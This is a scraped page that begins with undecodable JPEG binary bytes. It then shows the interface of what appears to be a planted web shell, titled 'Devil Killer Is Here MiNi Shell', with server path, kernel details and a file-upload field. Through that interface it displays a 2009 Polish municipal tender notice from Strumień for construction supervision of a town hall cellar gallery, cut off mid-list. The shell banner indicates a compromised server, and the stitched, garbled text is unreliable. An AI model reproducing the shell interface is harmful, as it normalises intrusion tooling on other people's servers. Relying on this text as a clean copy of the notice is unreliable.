JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090909/312548-N-2009.html

<p class="kh_header"><b>Strumień: Wykonywanie czynności Inwestora Zastępczego dla zadania: 
Budatín - Strumień: rewitalizacja i rozwój dziedzictwa kulturowego (Adaptacja piwnic Ratusza Miejskiego - Galeria Strumień wraz z zagospodarowaniem terenu)</b><br>
<b>Numer ogłoszenia: 312548 - 2009; data zamieszczenia: 09.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Strumieniu , Rynek 4, 43-246 Strumień, woj. śląskie, tel. 0-33 8570142, faks 0-33 8570247.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamowieniapubliczne.strumien.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie czynności Inwestora Zastępczego dla zadania: 
Budatín - Strumień: rewitalizacja i rozwój dziedzictwa kulturowego (Adaptacja piwnic Ratusza Miejskiego - Galeria Strumień wraz z zagospodarowaniem terenu).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Zamówienie obejmuje:
Wykonywanie czynności Inwestora Zastępczego dla zadania Budatín - Strumień: rewitalizacja i rozwój dziedzictwa kulturowego (Adaptacja piwnic Ratusza Miejskiego - Galeria Strumień wraz z zagospodarowaniem terenu),  na które składa się:
2.1.  Adaptacja piwnic ratusza na galerię
2.2. Wyburzenie istniejących i budowę nowych toalet publicznych w ich miejscu
2.3. Odnowa przestrzeni z tyłu budynku Ratusza od ul. Pocztowej, w tym rozbiórka budynku oficyny na zapleczu Ratusza i budowa oświetlenia zewnętrznego
2.4. Budowa nowego zjazdu z ulicy Pocztowej.
 Zadanie to będzie realizowane na podstawie dokumentacji projektowej 
 stanowiącej część [D] niniejszej specyfikacji istotnych warunków zamówienia.

Inwestor Zastępczy wykonuje czynności zastępstwa inwestycyjnego w imieniu i na rzecz Zamawiającego tj. Gminy Strumień. W ramach realizacji zamówienia Inwestor Zastępczy będzie prowadził monitoring, nadzór i kontrolę oraz sprawozdawczość dla projektu, w tym pełnienie funkcji inspektora nadzoru. 
   Inwestor Zastępczy jest zobowiązany do samodzielnego zorganizowania w miejscu wykonywania czynności będących przedmiotem niniejszego zamówienia biura do wykonywania obowiązków Inwestora Zastępczego oraz innych niezbędnych środków i urządzeń biurowych, urządzeń komunikowania się, itp., które zabezpieczy na własny koszt. 
3. Do podstawowych obowiązków Inwestora Zastępczego należy:
1)	Uzyskanie niezbędnych danych do realizacji i nadzorowania zadania.
2)	Kontrolowanie wykonywania robót pod kątem zgodności z umową o dofinansowanie projektu i obowiązującymi przepisami.
3)	Uczestnictwo w imieniu Inwestora właściwego wraz z Wykonawcą robót w procedurze uzyskania koniecznych pozwoleń uzgodnień oraz innych decyzji administracyjnych.
4)	Opracowanie oraz przekazanie Inwestorowi właściwemu dokumentów niezbędnych do uruchomienia finansowania w tym finansowania uzupełniającego dla zadania, (jeżeli taka możliwość wystąpi). 
5)	Nawiązanie kontaktów oraz współpraca z wszystkimi instytucjami współfinansującymi inwestycję, (jeżeli takie instytucje wystąpią). 
6)	Współpraca z instytucjami dofinansowującymi,
7)	Udział w negocjacjach dotyczących warunków dofinansowania, oceny umowy określającej sposób korzystania z przyznanych środków finansowych.
8)	Pełnienie nadzoru inwestorskiego w pełnym zakresie zgodnie z art. 25 i 26 ustawy             z dnia 7 lipca 1994 r. Prawo budowlane (jednolity tekst: Dz. U. z 2006 r. Nr 156, poz. 1118, z pózn. zmianami), a w szczególności:
-	reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z dokumentacją techniczną, pozwoleniem na budowę, przepisami prawa i Polskimi Normami oraz zasadami wiedzy technicznej,
-	sprawdzenie jakości wykonanych robót, wbudowanych materiałów budowlanych, zapobieganie zastosowaniu materiałów wadliwych, nie dopuszczonych do obrotu i stosowania na budowie,
-	regularne sprawdzanie postępu robót na budowie oraz jakości ich wykonania, a także wszystkich innych działań Wykonawcy robót w aspekcie jego zobowiązań wynikających z kontraktu,
-	kontrolowanie przestrzegania przez Wykonawcę robót przepisów BHP, przeciwpożarowych  i  ochrony  środowiska  naturalnego,
-	uzgadnianie lokalizacji baz, warsztatów, magazynów, składowisk ukopów i dróg dojazdowych  na  terenie  i  wokół  terenu  budowy,
-	współdziałanie z władzami lokalnymi i użytkownikami urządzeń podziemnych w  przypadku  uszkodzenia  przez  wykonawcę robót  nie  uwzględnionych w  dokumentacji  urządzeń  podziemnych,
-	sprawdzenie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji i urządzeń technicznych,
-	dostarczanie kompetentnym organom sprawozdań z wyników wszelkich prób i odbiorów wykonanych zgodnie z wymaganiami, warunkami umowy oraz obowiązującymi w Polsce przepisami Prawa Budowlanego
-	przygotowanie i udział w czynnościach odbioru obiektów budowlanych i przekazaniu ich do użytkowania,
-	prowadzenie bieżących rozliczeń budowy,
-	wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących:
a) usunięcia nieprawidłowości lub zagrożeń,
b) wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych oaz urządzeń technicznych,
-	żądanie od kierownika budowy lub kierownika robót dokonania poprawek, bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie, bądź spowodować niedopuszczalną niezgodność z projektem lub           z pozwoleniem na budowę,
-	prawo wstrzymania robót jeśli jest to konieczne dla ich prawidłowego wykonania oraz w przypadku, gdy Wykonawca nie wypełnia swych obowiązków z należytą starannością, wiedzą techniczną i postanowieniami zawartej z nim umowy,
-	kontrolę jakości używanych materiałów zgodnie z prawem żądania dodatkowych badań jakościowych, a w szczególności obowiązkowy odbiór przedstawionych przez Wykonawcę certyfikatów i deklaracji zgodności materiałów przed ich wbudowaniem,
-	badanie usunięcia przez Wykonawcę ujawnionych wad w jakości prac oraz wnioskowanie o potrącenie z wynagrodzenia Wykonawcy kar umownych         w przypadku nie usunięcia tych wad,
-	udział w czynnościach odbioru końcowego, gwarancyjnego i pogwarancyjnego.   W ramach tych czynności Inspektor zobowiązany jest do:
a)stwierdzenia gotowości do odbioru,
        b) przekazania Zamawiającemu protokołów odbioru oraz dokumentacji powykonawczej
-	dbanie o interesy Zamawiającego oraz podejmowanie czynności zapewniających techniczną poprawność realizowanej inwestycji,
-	cotygodniowy pobyt na terenie realizowanej inwestycji inspektorów nadzoru nad branżami, które aktualnie są realizowane, oraz bieżące reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności, jej realizacji z przepisami prawa, umowy oraz projektu,
-	potwierdzanie faktyczne wykonywanych robót oraz usunięcia wad,
-	przedkładanie na żądanie zamawiającego pisemnych okresowych raportów dla Zamawiającego z postępu prac i o zgodności postępu prac z ustalonym harmonogramem,
-	sprawdzanie obmiarów robót oraz potwierdzanie ilości i jakości wykonywanych robót jako podstawy do zapłaty wynagrodzenia Wykonawcy robót,
-	kontrolowanie rozliczeń zadania, w tym ilości i jakości użytych materiałów, 
-	weryfikacja kosztów i sprawdzanie faktur,
-	sygnalizowanie Zamawiającemu o wszelkich okolicznościach mogących mieć wpływ na terminowość oraz poprawność wykonywanych robót budowlanych oraz o wystąpieniu okoliczności nieprzewidzianych w dokumentacji projektowej,
-	udział w czynnościach przekazania Wykonawcy zadania terenu budowy    i udział w naradach technicznych,
-	sprawdzanie objęcia ubezpieczeniem Wykonawcy przez cały okres budowy,
-	zabezpieczenie nadzoru w zakresie stanowiącym części inwestycji, w których nie posiada on uprawnień do nadzorowania odpowiadając za efekt tak ustanowionego nadzoru lub jego zaniechanie jak za własne działanie,
-	reprezentowanie interesów zamawiającego.
9)	Ustalenie wraz z Wykonawcą robót oraz bieżące nadzorowanie i ewentualne korygowanie harmonogramu prac.
10)	Przygotowanie wszelkich materiałów do umożliwienia dokonania odbioru końcowego, powiadomienie wszystkich uczestników procesu inwestycyjnego o terminie tego odbioru.
11)	Przeprowadzenie odbioru końcowego zadania.
12)	Sprawdzanie zakresów robót, protokołów odbioru oraz faktur wystawianych przez Wykonawcę robót.
13)	Sporządzanie protokołów potwierdzających prawidłowość wykonania robót przez Wykonawcę robót, stanowiących załącznik do wystawionej faktury.
14)	Dokonywanie pełnej sprawozdawczości finansowej, zarówno dla Inwestora właściwego, jak i wszelkich instytucji uczestniczących w finansowaniu zadania, (jeżeli takie wystąpią i jeżeli sprawozdawczości takiej będą wymagały). Sprawozdania finansowe mają być dokonywane przez Inwestora Zastępczego w okresach uzgodnionych z Inwestorem właściwym, bez wezwania.
15)	Prowadzenie pełnych rozliczeń inwestycji z instytucjami dofinansowującymi w zakresie prac objętych inwestycją pn. Budatín - Strumień: rewitalizacja i rozwój dziedzictwa kulturowego (Adaptacja piwnic Ratusza Miejskiego - Galeria Strumień wraz z zagospodarowaniem terenu), w tym:
-	systematyczne monitorowanie przebiegu realizacji zadania oraz niezwłoczne informowanie o zaistniałych nieprawidłowościach,
-	pomiar wartości wskaźników osiągniętych dzięki realizacji zadania ze względu na specyfikę poszczególnych produktów i rezultatów projektu, wskaźniki monitorowane będą zgodnie z wytycznymi instytucji dofinansowujących projekt,
-	przygotowywanie i przekazywanie sprawozdań z realizacji zadania, Inwestorowi właściwemu jak również Instytucjom dofinansowującym projekt,
-	przekazywanie do instytucji finansujących wszystkich dokumentów i informacji związanych z realizacją projektu, których instytucje finansujące bądź Inwestor właściwy zażądają w okresie realizacji zadania.
-	 kontrola rozliczeń finansowych w tym :
- kontrola prawidłowości wystawienia faktur, zakresów prac i kwot w zakresie zgodności z zawartą umową z Wykonawcą , 
- sprawdzanie faktur częściowych przedkładanych przez wykonawcę kwalifikowanie ich do zapłaty i przekazanie ich zamawiającemu do zapłaty 
- sprawdzanie kalkulacji ewentualnych robót dodatkowych lub zamiennych 
- przygotowanie materiałów związanych z rozliczeniem ewentualnych kar umownych oraz odszkodowań obciążających wykonawcę za nienależyte lub nieterminowe wykonanie przez niego zobowiązań umownych 
- rozliczenie końcowe inwestycji (włącznie z rozliczeniem dotacji pozyskanych przez Zamawiającego ze źródeł zewnętrznych. 
16)	Weryfikacja pod względem formalnym i merytorycznym, akceptacja, 
i przekazywanie do zatwierdzenia przez Inwestora właściwego dokumentów wystawianych przez Wykonawców dotyczących realizowanej inwestycji.
17)	Po skończeniu robót budowlanych, podczas okresu gwarancyjnego, Inwestor zastępczy będzie uczestniczył w nadzorowaniu inspekcji gwarancyjnych, końcowych akceptacji i rozwiązywaniu sporów.  W szczególności będzie przeprowadzał regularne inspekcje, zgłaszał wady oraz kontrolował ich usuwanie przez Wykonawcę robót oraz będzie uczestniczył w ewentualnym rozwiązywaniu sporów pomiędzy Inwestorem właściwym a Wykonawcą robót. 
18) Specjalistyczny nadzór inwestorski budowlany winien obejmować następujące specjalizacje:
-	 konstrukcyjno - budowlana 
-	sieci, urządzenia i instalacje sanitarne kanalizacyjne 
-	sieci i instalacje elektroenergetyczne, w słaboprądowe
-	budowa dróg.
19) Zamawiający zastrzega, że jeżeli wystąpią roboty dodatkowe, wykonawca wykonywać będzie czynności Inwestora Zastępczego oraz nadzór nad nimi bez dodatkowego wynagrodzenia  z uwzględnieniem odpowiednich zapisów projektu umowy, odnośnie przedłużenia terminu realizacji. Jeżeli wystąpią roboty dodatkowe, objęte dodatkowym dofinansowaniem, wykonywanie czynności nadzoru inwestorskiego objęte będzie umową dodatkową na pełnienie nadzoru inwestorskiego. Pozostałe czynności inwestora zastępczego wykonywane będą w ramach niniejszego zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.50.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca przystępujący do przetargu powinien spełniać następujące wymagania:

1.	Posiadanie uprawnień do wykonywania określonej działalności lub czynności oraz nie podleganie wykluczeniu z postępowania 
Podstawy prawne wykluczenia z postępowania określają art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych. W przypadku podmiotów działających wspólnie warunek dotyczący niepodleganiu wykluczeniu zgodnie z art. 24 ust. 1 i 2, o którym mowa powyżej, muszą spełniać łącznie wszystkie podmioty działające wspólnie.

2. Potencjał kadrowy:
Dysponować odpowiednio wykwalifikowanymi osobami, dla pełnienia funkcji inspektorów nadzoru, posiadającymi uprawnienia do kierowania i nadzorowania robót budowlanych w specjalności:
- konstrukcyjno-budowlanej bez ograniczeń, wraz z kwalifikacjami do nadzorowania i kierowania robotami budowlanymi przy zabytkach nieruchomych -1 osoba, - do pełnienia funkcji koordynatora inspektorów nadzoru ,
   -  drogowej - 1 osoba,
   -  instalacyjno - sanitarnej ( instalacje wod. - kan.,  c. o. oraz wentylacji)  - 1 osoba,
         -  elektrycznej, w zakresie sieci, instalacji i urządzeń elektrycznych, bez ograniczeń -1 osoba,
wraz z zaświadczeniami o przynależności do odpowiedniej izby inżynierów budownictwa, 
a nadto dysponować:
-	jedną osobą posiadającą doświadczenie w zakresie rozliczania i kontroli realizacji projektów inwestycyjnych z zewnętrznych środków pomocowych,
-	jedną osobą posiadającą doświadczenie w zakresie sprawozdawczości 
i monitoringu realizacji projektów inwestycyjnych z zewnętrznych środków pomocowych, co należy udokumentować, jak w pkt. IV. 1.2.4).

3. Doświadczenie zawodowe:
Wykonawca musi udowodnić poprzez przedstawienie w załączniku określonym w pkt. IV.1.2.5 oraz dołączenie dokumentów określonych w pkt. IV.1.2.5, potwierdzających pełnienie w okresie ostatnich trzech lat przed wszczęciem postępowania funkcji Inwestora Zastępczego lub Inżyniera Kontraktu nad co najmniej dwoma zadaniami odpowiadającymi swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. 
     Jako usługę odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia Zamawiający rozumie pełnienie funkcji Inwestora Zastępczego lub Inżyniera Kontraktu dotyczącego realizacji robót budowlanych, o wartości nie niższej niż 500 000 ,00 PLN  w tym jednego zadania z zakresu remontu obiektów zabytkowych nieruchomych  i jednego dofinansowanego z zewnętrznych środków pomocowych. 
    Jako referencje (inne dokumenty) dotyczące realizacji z ostatnich 3 lat przed dniem wszczęcia postępowania, Zamawiający uzna takie, które:
-	w przypadku usług zrealizowanych dotyczą usług jw., których realizacja miała miejsce nie wcześniej jak 3 lata przed dniem wszczęcia postępowania,
-	w przypadku usług realizowanych dotyczą usług jw., których realizacja trwała do dnia wszczęcia postępowania, a zrealizowany do tego czasu zakres objętych nadzorem inwestorskim robót budowlanych wyniósł co najmniej 500 000,00 PLN. 

4. Obowiązującą formą zapłaty za przedmiot zamówienia będzie wynagrodzenie ryczałtowe.

-	Złożenie oferty jest jednoznaczne z akceptacją w całości warunków zawartych w niniejszej specyfikacji jako wyłącznej podstawy przetargu.
-	Od uczestników oczekuje się starannego zapoznania się z projektem, dostarczoną specyfikacją istotnych warunków zamówienia, a także dokonania wizji lokalnej na terenie przyszłej budowy, której dotyczyć będą czynności zastępstwa inwestycyjnego będącego przedmiotem niniejszego postępowania oraz zdobycia wszelkich informacji, które mogą być konieczne do przygotowania oferty  i podpisania umowy.
-	Zamawiający odrzuci oferty zgodnie z art. 89 i art. 90 ustawy Prawo zamówień publicznych,
-	 Zamawiający dokona wykluczenia wykonawców zgodnie z treścią art. 24 ust 1 i 2, a w szczególności tych, którzy nie złożyli wraz z ofertą oświadczeń i dokumentów określonych w pkt. IV.1. po uprzednim wyczerpaniu procedury określonej w art. 26 ust. 3 oraz art. 87 ust. 2 ustawy Prawo zamówień publicznych.
-	Oferty wykonawców, którzy zostali wykluczeni traktowane będą jako odrzucone.
-	Wykonawca ponosi wszelkie koszty związane ze sporządzeniem i złożeniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1.	Wypełniony szczegółowo formularz oferty, część A SIWZ
1.2.	Dane dotyczące wiarygodności prawnej, finansowej i technicznej Wykonawcy:
1)	Oświadczenie z art. 22 ust 1 ustawy Prawo zamówień publicznych oraz, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych z dnia 29.01.2004 r. na załączniku nr I. 
2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3)	Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz   właściwego oddziału Zakładu Ubezpieczeń Społecznych, lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne          i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)	Wykaz osób i podmiotów, którymi dysponuje, lub będzie dysponował wykonawca i które będą uczestniczyć w realizacji zamówienia wraz z informacjami potwierdzającymi spełnienie warunku udziału w postępowaniu, oraz pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował, a także z określeniem zakresu wykonywanych przez nie czynności z uwzględnieniem spełnienia wymogów pkt. III.2, na załączniku nr II. 
5)	 Wykaz wykonanych, lub wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania, oraz załączeniem co najmniej 2 referencji (innych dokumentów) od poprzednich zamawiających (inwestorów) zgodnie z wymaganiami pkt. III.3, potwierdzających, że usługi zostały wykonane należycie na załączniku nr III.
1.3.	Zaparafowany na dowód akceptacji przez osobę (osoby) upoważnioną do   reprezentacji Wykonawcy projekt umowy.

UWAGI:
-	dokumenty z pkt. 1.2.1) - 1.2.5), mogą być przedstawione w formie oryginałów albo czytelnych kopii poświadczonych za zgodność z oryginałem przez wykonawcę,
-	złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów albo nierzetelnych oświadczeń zagrożone jest karą pozbawienia wolności (art. 297 ustawy z dnia 6.06.1997 roku - Kodeks Karny (Dz. U. z 1997 roku, nr 88, poz. 553 z późn. zm.) i zgodnie z przepisami ustawy Prawo Zamówień Publicznych powoduje wykluczenie wykonawcy z postępowania o udzielenie zamówienia publicznego.

2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
2.1.	 zamiast dokumentów, o których mowa w pkt 1.2.1, 1.2.3 składa odpowiedni dokument, lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę, lub miejsce zamieszkania potwierdzające, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
-	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne             i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2.2. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. 2.1. można je zastąpić dokumentem zawierającym oświadczenie złożonym przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
2.3. Dokumenty i oświadczenia, o których mowa w pkt. 2., sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
3.  Oferta składana przez dwa lub więcej podmiotów gospodarczych musi spełniać następujące warunki:
3.1. Spełniać warunki określone w pkt. III przy uwzględnieniu zsumowania danych od wszystkich podmiotów;
3.2. Zawierać dokumenty i oświadczenia wymienione w pkt. od 1.2.2) do 1.2.3) dotyczące każdego podmiotu; pozostałe dokumenty winny dotyczyć wykonawcy (konsorcjum, lub spółki cywilnej) tj. w ofercie muszą być złożone przedmiotowe dokumenty, przez tegotych wykonawcę wykonawców, który którzy spełnia spełniają warunek.
3.3. Musi być podpisana w taki sposób, by zobowiązywała prawnie wszystkie Strony;
3.4. Zawierać pełnomocnictwo w rozumieniu art. 23 ust. 2 ustawy Prawo zamówień publicznych. 

4.	Każdy Wykonawca przedłoży tylko jedną ofertę, sam lub jako reprezentant spółki cywilnej lub konsorcjum. Oferty wykonawcy, który przedłoży więcej niż jedną ofertę zostaną odrzucone.

5.	Oferta musi obejmować całość zamówienia.


6.	Wykonawcy przedstawią oferty zgodnie z wymaganiami specyfikacji istotnych warunków zamówienia. Alternatywy nie będą brane pod uwagę. Zamawiający nie dopuszcza składania ofert wariantowych.

7.	Oferta będzie napisana w języku polskim na maszynie, komputerze lub nieścieralnym atramentem oraz będzie podpisana przez upełnomocnionego przedstawiciela (przedstawicieli) Wykonawcy, trwale połączona (zszyta dowolną techniką biurową), celem uniemożliwienia samoczynnej dekompletacji podczas pracy komisji. Cenę oferty należy ustalić w PLN.
-	Winny być podpisane wszystkie strony formularza oferty, a także wszystkie załączniki do oferty, przez osobę (osoby) upoważnioną do reprezentacji wykonawcy. Miejsca, w których zostaną dokonane poprawki lub korekty błędów będą parafowane przez osobę (osoby) upoważnioną do reprezentacji wykonawcy. Upoważnienie do podpisania oferty winno być dołączone do oferty, o ile nie wynika z innych dokumentów załączonych przez wykonawcę.
-	Zaleca się, aby wszystkie strony oferty wraz z załącznikami i wymaganymi dokumentami kolejno ponumerować i zaparafować niezależnie od składanych wyżej określonych podpisów.
W przypadku składania oferty przez dwa lub więcej podmioty gospodarcze, włączone do oferty kopie dokumentów wszystkich podmiotów winny być poświadczone za zgodność z oryginałem przez wykonawcę w tym wypadku przez upoważnionego do reprezentacji przedstawiciela konsorcjum lub spółki.

8.	Wykonawca zamieści ofertę w kopercie, która:
-	będzie zaadresowana na zamawiającego:
Urząd Miejski w Strumieniu, ul. Rynek 4, 43-246 Strumień
-	będzie opisana:
